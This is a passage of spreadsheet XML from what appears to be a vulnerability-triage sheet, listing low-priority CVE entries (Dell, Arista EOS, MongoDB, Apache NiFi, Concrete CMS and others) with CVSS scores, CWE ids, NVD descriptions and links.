      <c r="E1411" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1411" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1411" s="5" t="inlineStr"/>
      <c r="H1411" s="5" t="inlineStr"/>
      <c r="I1411" s="5" t="inlineStr"/>
      <c r="J1411" s="5" t="inlineStr"/>
      <c r="K1411" s="5" t="inlineStr"/>
      <c r="L1411" s="5" t="inlineStr"/>
      <c r="M1411" s="5" t="inlineStr"/>
      <c r="N1411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1411" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1411" s="5" t="inlineStr"/>
      <c r="Q1411" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R1411" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains an Improper Link Resolution Before File Access ('Link Following') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="S1411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71182</t>
        </is>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1412" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1412" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-24287</t>
        </is>
      </c>
      <c r="D1412" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="E1412" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1412" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1412" s="5" t="inlineStr"/>
      <c r="H1412" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1412" s="5" t="inlineStr"/>
      <c r="J1412" s="5" t="inlineStr"/>
      <c r="K1412" s="5" t="inlineStr"/>
      <c r="L1412" s="5" t="inlineStr"/>
      <c r="M1412" s="5" t="inlineStr"/>
      <c r="N1412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1412" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1412" s="5" t="inlineStr"/>
      <c r="Q1412" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R1412" s="5" t="inlineStr">
        <is>
          <t>Portable Puzzle Collection before 20230116.5782e29 was discovered to contain a buffer overflow via the "M" command.</t>
        </is>
      </c>
      <c r="S1412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-24287</t>
        </is>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1413" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90575</t>
        </is>
      </c>
      <c r="D1413" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="E1413" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1413" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1413" s="5" t="inlineStr"/>
      <c r="H1413" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1413" s="5" t="inlineStr"/>
      <c r="J1413" s="5" t="inlineStr"/>
      <c r="K1413" s="5" t="inlineStr"/>
      <c r="L1413" s="5" t="inlineStr"/>
      <c r="M1413" s="5" t="inlineStr"/>
      <c r="N1413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1413" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1413" s="5" t="inlineStr"/>
      <c r="Q1413" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="R1413" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in PHPGurukul Small CRM 4.0. This impacts the function unserialize of the file /crm/login.php of the component Login Success Handler. This manipulation of the argument geopluginURL causes deserialization. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="S1413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90575</t>
        </is>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1414" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1414" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-37366</t>
        </is>
      </c>
      <c r="D1414" s="5" t="n">
        <v>2.8</v>
      </c>
      <c r="E1414" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1414" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1414" s="5" t="inlineStr"/>
      <c r="H1414" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1414" s="5" t="inlineStr"/>
      <c r="J1414" s="5" t="inlineStr"/>
      <c r="K1414" s="5" t="inlineStr"/>
      <c r="L1414" s="5" t="inlineStr"/>
      <c r="M1414" s="5" t="inlineStr"/>
      <c r="N1414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1414" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1414" s="5" t="inlineStr"/>
      <c r="Q1414" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R1414" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Samsung Exynos Mobile Processor, Automotive Processor, and Modem Exynos 9810, Exynos 9610, Exynos 9820, Exynos 980, Exynos 850, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380, Exynos 1330, Exynos 9110, Exynos W920, Exynos Modem 5123, Exynos Modem 5300, an Exynos Auto T5123. In the Shannon SM Task, improper handling of a loop with an unreachable exit condition cannot guarantee the termination of a required service via a malformed SM message.</t>
        </is>
      </c>
      <c r="S1414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-37366</t>
        </is>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1415" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1415" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64031</t>
        </is>
      </c>
      <c r="D1415" s="5" t="n">
        <v>2.5</v>
      </c>
      <c r="E1415" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1415" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1415" s="5" t="inlineStr"/>
      <c r="H1415" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1415" s="5" t="inlineStr"/>
      <c r="J1415" s="5" t="inlineStr"/>
      <c r="K1415" s="5" t="inlineStr"/>
      <c r="L1415" s="5" t="inlineStr"/>
      <c r="M1415" s="5" t="inlineStr"/>
      <c r="N1415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1415" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1415" s="5" t="inlineStr"/>
      <c r="Q1415" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1415" s="5" t="inlineStr">
        <is>
          <t>libarchive 3.8.x before 3.8.2 has a strcpy heap-based buffer overflow in the gzip writer via the original-filename field to archive_compressor_gzip_open in archive_write_add_filter_gzip.c, aka GHSA-92wx-p669-8gr9. This relates to bsdtar. Exploitation envisions a marginally plausible scenario in which original-filename is obtained from an untrusted party. (original-filename is not derived from the input data.)</t>
        </is>
      </c>
      <c r="S1415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64031</t>
        </is>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92385</t>
        </is>
      </c>
      <c r="D1416" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="E1416" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1416" s="5" t="inlineStr"/>
      <c r="H1416" s="5" t="inlineStr"/>
      <c r="I1416" s="5" t="inlineStr"/>
      <c r="J1416" s="5" t="inlineStr"/>
      <c r="K1416" s="5" t="inlineStr"/>
      <c r="L1416" s="5" t="inlineStr"/>
      <c r="M1416" s="5" t="inlineStr"/>
      <c r="N1416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1416" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1416" s="5" t="inlineStr"/>
      <c r="Q1416" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1416" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Online Food Ordering System 1.0. The affected element is an unknown function of the file /admin/update_category.php of the component Category Update. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S1416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92385</t>
        </is>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19640</t>
        </is>
      </c>
      <c r="D1417" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1417" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1417" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1417" s="5" t="inlineStr"/>
      <c r="H1417" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1417" s="5" t="inlineStr"/>
      <c r="J1417" s="5" t="inlineStr"/>
      <c r="K1417" s="5" t="inlineStr"/>
      <c r="L1417" s="5" t="inlineStr"/>
      <c r="M1417" s="5" t="inlineStr"/>
      <c r="N1417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1417" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1417" s="5" t="inlineStr"/>
      <c r="Q1417" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1417" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS, an authenticated user with access to the gNMI (gRPC Network Management Interface) may receive incorrect authorization results, potentially allowing access beyond their currently assigned permissions.
This issue was discovered internally by Arista and the company is not aware of any malicious uses of this issue in customer networks.</t>
        </is>
      </c>
      <c r="S1417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19640</t>
        </is>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73440</t>
        </is>
      </c>
      <c r="D1418" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1418" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1418" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1418" s="5" t="inlineStr"/>
      <c r="H1418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1418" s="5" t="inlineStr"/>
      <c r="J1418" s="5" t="inlineStr"/>
      <c r="K1418" s="5" t="inlineStr"/>
      <c r="L1418" s="5" t="inlineStr"/>
      <c r="M1418" s="5" t="inlineStr"/>
      <c r="N1418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1418" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1418" s="5" t="inlineStr"/>
      <c r="Q1418" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="R1418" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Simple Network Management Protocol (SNMP) configured, SNMPv3 local or remote user credentials may be exposed as a one-way hashed, localized key value within the device's running and sanitized configurations. An authenticated user who gains access to this sensitive information could leverage it to perform unauthorized read operations on SNMP tables or to send fraudulent trap notifications to the Network Management System (NMS).
This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S1418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73440</t>
        </is>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1419" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="D1419" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1419" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1419" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1419" s="5" t="inlineStr"/>
      <c r="H1419" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1419" s="5" t="inlineStr"/>
      <c r="J1419" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1419" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1419" s="5" t="inlineStr"/>
      <c r="M1419" s="5" t="inlineStr"/>
      <c r="N1419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1419" s="5" t="inlineStr"/>
      <c r="Q1419" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R1419" s="5" t="inlineStr">
        <is>
          <t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t>
        </is>
      </c>
      <c r="S1419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86089</t>
        </is>
      </c>
      <c r="D1420" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1420" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1420" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G1420" s="5" t="inlineStr"/>
      <c r="H1420" s="5" t="inlineStr"/>
      <c r="I1420" s="5" t="inlineStr"/>
      <c r="J1420" s="5" t="inlineStr"/>
      <c r="K1420" s="5" t="inlineStr"/>
      <c r="L1420" s="5" t="inlineStr"/>
      <c r="M1420" s="5" t="inlineStr"/>
      <c r="N1420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1420" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1420" s="5" t="inlineStr"/>
      <c r="Q1420" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1420" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 2.11.0 supports migrating the contents of a version-controlled Process Group into a Connector using REST API methods that list eligible migration sources and submit migration requests. The framework authorized both methods against the target Connector alone, without evaluating access to the Process Groups involved. The absence of Process Group authorization allowed an authenticated user with read access to a Connector to enumerate the identifiers, names, and flow registry details of version-controlled Process Groups outside the scope of granted read policies. It also allowed a user with write access to a Connector to migrate a Process Group without write access to that Process Group, copying the flow definition, referenced assets, and component state into the Connector, and leaving the source Process Group disabled and renamed. Migration excludes sensitive property values and requires the source Process Group to be stopped with empty queues, which limits the scope of exposure. Apache NiFi installations that do not implement component-level authorization policies for Process Groups are not subject to this vulnerability, because the framework enforces Connector write permissions as the security boundary. Upgrading to Apache NiFi 2.12.0 is the recommended mitigation, which filters migration sources to Process Groups the requesting user is authorized to read, and requires write access to the source Process Group when submitting a migration request.</t>
        </is>
      </c>
      <c r="S1420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86089</t>
        </is>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92359</t>
        </is>
      </c>
      <c r="D1421" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1421" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1421" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1421" s="5" t="inlineStr"/>
      <c r="H1421" s="5" t="inlineStr"/>
      <c r="I1421" s="5" t="inlineStr"/>
      <c r="J1421" s="5" t="inlineStr"/>
      <c r="K1421" s="5" t="inlineStr"/>
      <c r="L1421" s="5" t="inlineStr"/>
      <c r="M1421" s="5" t="inlineStr"/>
      <c r="N1421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1421" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1421" s="5" t="inlineStr"/>
      <c r="Q1421" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-942</t>
        </is>
      </c>
      <c r="R1421" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in ag-ui-protocol ag-ui 0.3.0. The affected element is the function create_strands_app of the file integrations/aws-strands/python/src/ag_ui_strands/utils.py of the component CORSMiddleware. The manipulation results in permissive cross-domain policy with untrusted domains. The attack may be launched remotely. The attack requires a high level of complexity. The exploitability is described as difficult. Upgrading to version AGUI.Abstractions@0.0.6 is sufficient to fix this issue. The patch is identified as 9b143b9668fa52c2054ede9d34a45ac4b4401089. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92359</t>
        </is>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73442</t>
        </is>
      </c>
      <c r="D1422" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1422" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1422" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1422" s="5" t="inlineStr"/>
      <c r="H1422" s="5" t="inlineStr"/>
      <c r="I1422" s="5" t="inlineStr"/>
      <c r="J1422" s="5" t="inlineStr"/>
      <c r="K1422" s="5" t="inlineStr"/>
      <c r="L1422" s="5" t="inlineStr"/>
      <c r="M1422" s="5" t="inlineStr"/>
      <c r="N1422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1422" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1422" s="5" t="inlineStr"/>
      <c r="Q1422" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R1422" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with VRRP enabled, the peer device VRRP authentication credentials are logged in cleartext on the switch, allowing an authenticated user with sufficient privileges to view agent trace logs (or a system receiving forwarded log output) to obtain the peer device VRRP authentication credentials without having access to the network segment on which VRRP is running.</t>
        </is>
      </c>
      <c r="S1422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73442</t>
        </is>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1423" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75943</t>
        </is>
      </c>
      <c r="D1423" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1423" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1423" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1423" s="5" t="inlineStr"/>
      <c r="H1423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1423" s="5" t="inlineStr"/>
      <c r="J1423" s="5" t="inlineStr"/>
      <c r="K1423" s="5" t="inlineStr"/>
      <c r="L1423" s="5" t="inlineStr"/>
      <c r="M1423" s="5" t="inlineStr"/>
      <c r="N1423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1423" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1423" s="5" t="inlineStr"/>
      <c r="Q1423" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R1423" s="5" t="inlineStr">
        <is>
          <t>A brief (milliseconds to seconds) traffic leak may occur when an authenticated supplicant is removed, either via the clear dot1x host all CLI command or due to a supplicant timeout. During this window, the supplicant's traffic may pass without ACL enforcement.</t>
        </is>
      </c>
      <c r="S1423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75943</t>
        </is>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1424" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75945</t>
        </is>
      </c>
      <c r="D1424" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1424" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1424" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1424" s="5" t="inlineStr"/>
      <c r="H1424" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1424" s="5" t="inlineStr"/>
      <c r="J1424" s="5" t="inlineStr"/>
      <c r="K1424" s="5" t="inlineStr"/>
      <c r="L1424" s="5" t="inlineStr"/>
      <c r="M1424" s="5" t="inlineStr"/>
      <c r="N1424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1424" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1424" s="5" t="inlineStr"/>
      <c r="Q1424" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R1424" s="5" t="inlineStr">
        <is>
          <t>A race condition may cause a supplicant to remain in an authorized state after a clear dot1x host all command is issued.</t>
        </is>
      </c>
      <c r="S1424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75945</t>
        </is>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1425" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77191</t>
        </is>
      </c>
      <c r="D1425" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1425" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1425" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1425" s="5" t="inlineStr"/>
      <c r="H1425" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1425" s="5" t="inlineStr"/>
      <c r="J1425" s="5" t="inlineStr"/>
      <c r="K1425" s="5" t="inlineStr"/>
      <c r="L1425" s="5" t="inlineStr"/>
      <c r="M1425" s="5" t="inlineStr"/>
      <c r="N1425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1425" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1425" s="5" t="inlineStr"/>
      <c r="Q1425" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1425" s="5" t="inlineStr">
        <is>
          <t>An authenticated supplicant on an adjacent network may bypass intended network authorization policy and send unrestricted traffic during a brief window (milliseconds to seconds) between the completion of the authentication phase and the full enforcement of its assigned ACL.</t>
        </is>
      </c>
      <c r="S1425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77191</t>
        </is>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87031</t>
        </is>
      </c>
      <c r="D1426" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1426" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1426" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G1426" s="5" t="inlineStr"/>
      <c r="H1426" s="5" t="inlineStr"/>
      <c r="I1426" s="5" t="inlineStr"/>
      <c r="J1426" s="5" t="inlineStr"/>
      <c r="K1426" s="5" t="inlineStr"/>
      <c r="L1426" s="5" t="inlineStr"/>
      <c r="M1426" s="5" t="inlineStr"/>
      <c r="N1426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1426" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1426" s="5" t="inlineStr"/>
      <c r="Q1426" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1426" s="5" t="inlineStr">
        <is>
          <t>n Concrete CMS 9.2.0 through 9.5.3, the REST API user creation endpoint (POST /ccm/api/1.0/users, the add() method of concrete/src/Api/Controller/Users.php) did not perform a permission check before creating an account. As a result, any valid OAuth token carrying the users:add scope, including a client_credentials token with no associated user context, could create active, validated user accounts, bypassing email verification and administrator approval. Under default registration settings the created accounts could then edit page content, providing a path to stored cross-site scripting and further compromise. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting.</t>
        </is>
      </c>
      <c r="S1426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87031</t>
        </is>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1427" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90501</t>
        </is>
      </c>
      <c r="D1427" s="5" t="n">
        <v>2.1</v>
      </c>
